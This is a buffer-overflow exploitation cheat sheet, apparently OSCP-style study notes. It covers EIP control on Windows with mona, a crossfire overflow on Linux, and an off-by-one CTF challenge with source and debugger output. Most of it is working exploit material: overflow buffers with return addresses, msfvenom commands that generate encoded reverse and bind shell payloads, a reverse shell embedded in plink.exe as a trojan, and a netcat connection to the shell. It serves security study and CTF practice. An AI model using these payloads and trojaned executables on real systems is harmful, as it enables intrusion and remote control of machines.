BufferOverflows

Buffer Overflow¶

Windows Buffer Overflows¶

Test for Controlling EIP
- pattern_create.rb -l 2700
- pattern_offset.rb -q 39694438
Verify EIP location
- buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90
Check for “Bad Characters”
- Add Bad characters and see if EIP is still controlled ie \x00 - \xFF
Use Mona to determine a module that is unprotected
Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP

Use NASM to determine the HEX code for a JMP ESP instruction

    /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb

    JMP ESP  
    00000000 FFE4 jmp esp

Run Mona in immunity log window to find (FFE4) XEF command

    !mona find -s "\xff\xe4" -m slmfc.dll  
    found at 0x5f4a358f - Flip around for little endian format
    buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390

MSFVenom to create payload

msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"

Final Payload with NOP slide

buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode

Create a PE Reverse Shell

        msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
        -f  
        exe -o shell\_reverse.exe

Create a PE Reverse Shell and Encode 9 times with Shikata ga nai

        msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
        -f  
        exe -e x86/shikata\_ga\_nai -i 9 -o
        shell\_reverse\_msf\_encoded.exe

Create a PE reverse shell and embed it into an existing executable

        msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f
        exe -e x86/shikata\_ga\_nai -i 9 -x
        /usr/share/windows-binaries/plink.exe -o
        shell\_reverse\_msf\_encoded\_embedded.exe

Create a PE Reverse HTTPS shell

        msfvenom -p windows/meterpreter/reverse\_https LHOST=$ip
        LPORT=443 -f exe -o met\_https\_reverse.exe

Linux Buffer Overflows¶

Run Evans Debugger against an app
edb --run /usr/games/crossfire/bin/crossfire

ESP register points toward the end of our CBuffer

        add eax,12  
        jmp eax  
        83C00C add eax,byte +0xc  
        FFE0 jmp eax

Check for “Bad Characters”
- Add Bad characters and see if EIP is still controlled ie \x00 - \xFF
Find JMP ESP address
"\\x97\\x45\\x13\\x08" \# Found at Address 08134597

crash = "\\x41" \* 4368 + "\\x97\\x45\\x13\\x08" + "\\x83\\xc0\\x0c\\xff\\xe0\\x90\\x90"

msfvenom -p linux/x86/shell\_bind\_tcp LPORT=4444 -f c -b "\\x00\\x0a\\x0d\\x20" –e x86/shikata\_ga\_nai

Connect to the shell with netcat:
nc -v $ip 4444

One Byte Overflow¶

Vulnerable Code:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

struct B2{
    int (*ptr)();
    char c[128];
};

struct B1{
    char data[16];
    struct B2 *myStruct;
    char data2[128];
};

void secret(){

printf("Game 0ver! You win :P\n");

}

void function(){
    printf("Everything is fine.\n");
}

int main(int argc, char *argv[]){
    
    printf("\033[1mWelcome to ROPLevel7 by @bellis1000!\nThis level involves exploiting an off-by-one vulnerability.\n\n\x1b[0m");
    
    if (argc < 3){
        printf("Usage: %s <data> <block_data>\n",argv[0]);
        exit(0);
    }
    
    struct B1 *s = malloc(256);
    s->myStruct = malloc(256);
    
    s->myStruct->ptr = function;
    strncpy(s->myStruct->c,argv[2],126);
    strncpy(s->data2,argv[2],126);
    
    // this is where the off-by-one bug occurs
    for (int i = 0; i <= 16; i++){
        if (argv[1][i] != 0){
            s->data[i] = argv[1][i];
        }else{
            break;
        }
    }
    
    // call function pointer
    s->myStruct->ptr();
    
    return 0;
}

Exploit Code:

gcc -fno-stack-protector -o roplevel7 roplevel7.c
pwndbg> run AAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Starting program: /home/generalzero/Downloads/Exploit-Challenges-master/ROPLevel7/roplevel7 AAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
pwndbg> Welcome to ROPLevel7 by @bellis1000!
This level involves exploiting an off-by-one vulnerability.


Breakpoint 1, 0x00005555555552cb in main ()
c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0000004242424242 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────────────────────────────────
 RAX  0x0
 RBX  0x0
 RCX  0x41
 RDX  0x4242424242
 RDI  0x55555555973f ◂— 0x42424242424242 /* 'BBBBBBB' */
 RSI  0x7fffffffe170 ◂— 0x4242424242424242 ('BBBBBBBB')
 R8   0x7
 R9   0x7ffff7f8ba60 (main_arena+96) —▸ 0x5555555598c0 ◂— 0x0
 R10  0x18
 R11  0x7ffff7f51d80 ◂— 0xfff1c580fff1c570
 R12  0x555555555080 (_start) ◂— endbr64 
 R13  0x0
 R14  0x0
 R15  0x0
 RBP  0x7fffffffdc60 —▸ 0x5555555552e0 (__libc_csu_init) ◂— endbr64 
*RSP  0x7fffffffdc38 —▸ 0x5555555552cd (main+302) ◂— mov    eax, 0
*RIP  0x4242424242
─────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────────────────────────────────────
Invalid address 0x4242424242